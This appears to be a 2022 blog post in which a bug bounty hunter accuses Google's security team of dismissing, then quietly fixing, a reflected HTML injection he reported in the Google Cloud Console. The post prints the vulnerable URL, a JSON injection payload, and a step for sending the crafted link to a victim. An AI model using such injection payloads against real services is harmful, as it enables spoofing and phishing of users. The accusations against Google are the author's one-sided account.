How Google [ Security Team ] cheated ME!

Saransh Saraf aka (MR23R0)
3 min readFeb 7, 2022
Google cheated me or it has employees with zero knowledge of the Security field

Timeline:

bug reported : Dec 23, 2021 04:11PM

Marked as Intended behavior : Dec 23, 2021 06:25PM

Cross checked : Feb 07, 2022 12:47 AM

Hello fellow hackers, I’m Saransh Saraf an Indian bug bounty hunter

I claimed google, give the appropriate bounty. Don’t cheat with bug bounty hunters who are working day and night to make google more secure every day.

Devil behind the Good

On Dec 23, 2021 I targeted Google Cloud Platform And I’ve found Html Injection.

After investing 3 hours I escalated it from self html injection to reflected Html injection.

Google cloud Html injection

I reported the bug to google, as every bug bounty hunter does…

On Dec 23, 2021 04:11PM, I reported the bug

And got this as the response :

google response, Won’t fix Intended behavior [Lie]

I told them multiple times with proper exploit and PoC but they denied to accept in and fix it.

My reply to google

But they never accepted the issue.

Exploit :

Vulnerable URL : https://console.cloud.google.com/monitoring/metrics-explorer?pageState=Payload&project=Project_ID

Payload :

 {“xyChart”:{“dataSets”:[{“timeSeriesFilter”:{“filter”:”\”>\”><img src=x ><h1>POC BY SARANSH</h1>\n<img src=\”https://SomelinktoImage.com/sample.jpg\" style=\”width=500\”>”,”minAlignmentPeriod”:”60s”,”aggregations”:[{“perSeriesAligner”:”ALIGN_RATE”,”crossSeriesReducer”:”REDUCE_SUM”,”alignmentPeriod”:”60s”,”groupByFields”:[“metric.label.\”response_code\””]},{“perSeriesAligner”:”ALIGN_NONE”,”crossSeriesReducer”:”REDUCE_NONE”,”alignmentPeriod”:”60s”,”groupByFields”:[]}]},”targetAxis”:”Y1",”plotType”:”LINE”}],”options”:{“mode”:”COLOR”},”constantLines”:[],”timeshiftDuration”:”0s”,”y1Axis”:{“label”:”y1Axis”,”scale”:”LINEAR”}},”isAutoRefresh”:true,”timeSelection”:{“timeRange”:”1h”},”xZoomDomain”:{“start”:”2021–12–23T08:47:12.464Z”,”end”:”2021–12–23T08:47:41.585Z”},”yZoomFrame”:{“y1”:{“start”:-0.07111,”end”:0.92444}}}

Now you have to fill the project-Id and send it to the associated email owner to exploit the vulnerability.

But After Some time when I checked it again, on Feb 07, 2022 12:47 AM

Surprisingly they fixed the vulnerability, you can check that by yourself

And I checked my Gmail and issuetracker but I didn’t got any update that they accepted the bug and fixed it, because they didn’t Informed me :|

Now I need your support, to raise my voice against Google to get the appropriate reward & Recognition.

As you are also a bug bounty hunters or security researcher if you agree with me (they should give an appreciation or even a bounty for our efforts and time)

Please support me by signing this Petition : https://www.change.org/bughunters

PoC : https://youtu.be/ELEPzoI2j8w

Hope no one faces these type of problems…

Thanks Sumon Nath (@bugxploit) Sir for support

Do connect with us on Instagram :

@bugxploit : https://www.instagram.com/bugxploit/

@sarans0x00h : https://www.instagram.com/sarans0x00h/

Linkedin :

https://www.linkedin.com/in/saransh-saraf-2b514b20b/

Thank You Everyone for your support.

--

--

Saransh Saraf aka (MR23R0)

Writer of all kind, but mainly philosophy and cybersecurity mixed with physics concepts